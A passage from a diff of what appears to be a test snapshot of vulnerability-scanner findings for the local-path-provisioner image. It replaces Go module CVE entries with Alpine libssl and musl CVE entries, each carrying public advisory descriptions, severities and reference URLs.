"https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23839", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "https://access.redhat.com/security/cve/CVE-2021-23839", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", + "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", + "name": "openssl: incorrect SSLv2 rollback protection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", + "value": "https://avd.aquasec.com/nvd/cve-2021-23839", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", + "value": "https://access.redhat.com/security/cve/CVE-2021-23839", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.24-r10", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-28928", + "installedVersion": "1.1.24-r8", + "packageName": "musl", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "https://musl.libc.org/releases.html", + "https://ubuntu.com/security/notices/USN-5990-1", + "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2020-28928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://musl.libc.org/releases.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://ubuntu.com/security/notices/USN-5990-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.24-r10", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-28928", + "installedVersion": "1.1.24-r8", + "packageName": "musl-utils", + "references": [ + "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "https://musl.libc.org/releases.html", + "https://ubuntu.com/security/notices/USN-5990-1", + "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + ], + }, + "category": "Vulnerability", + "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-28928", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": 